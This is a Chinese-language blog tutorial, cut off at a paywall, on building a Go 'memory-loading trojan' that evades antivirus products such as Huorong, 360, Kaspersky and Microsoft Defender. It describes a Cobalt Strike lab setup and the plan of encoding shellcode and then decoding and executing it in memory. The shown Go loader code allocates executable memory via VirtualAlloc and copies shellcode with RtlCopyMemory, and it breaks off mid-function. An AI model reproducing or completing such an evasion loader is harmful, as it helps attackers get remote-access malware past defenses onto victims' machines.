本文介绍了如何使用Go语言编写内存加载的木马以实现免杀,包括环境配置、免杀思路、编码解码执行shellcode的实践过程,以及面对杀软的应对策略。通过实例和代码展示,帮助读者理解免杀技巧。
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一
作者:掌控安全-骚骑
背景
之前分享了个免杀入门文,很浅显,比较适合小白看…
文章在社区,地址我放在这了,有兴趣可以一戳:
https://bbs.zkaq.cn/t/4456.html (ps:社区邀请码可以文末扫码找助教领取,社区投稿还有钱赚)
这次实实在在写一个,能过微软自带def,火绒,卡巴这些!
一、0x01环境
靶机:
IP:192.168.111.10
杀软:火绒,360,卡巴,微软def
本机:
IP:192.168.111.11
安装环境:cobaltstrike,go环境
二、go环境安装
由于本人很久之前就安装了,所以直接上菜鸟教程吧
https://www.runoob.com/go/go-environment.html
三、实践
1.思路
主要是内存加载,对shellcode预先编码,然后解码执行。
2.举例
因为不是每个人每种语言都精通,但是当我们有需要了的时候怎么办?
我的方法就是找个案例,然后将不懂的函数查清楚,进而开始针对个人想要的功能进行修改或者拓展。
用重剑无锋大佬的文章中的案例做个示范:
远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)
(https://github.com/TideSec/BypassAntiVirus/)
package main
import (
"io/ioutil"
"os"
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
shellcode_buf = []byte{
0xfc, 0x48, ----shellcode----, 0xd5,
}
)
func checkErr(e
最低0.47元/天 解锁文章
扫一扫
1001
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
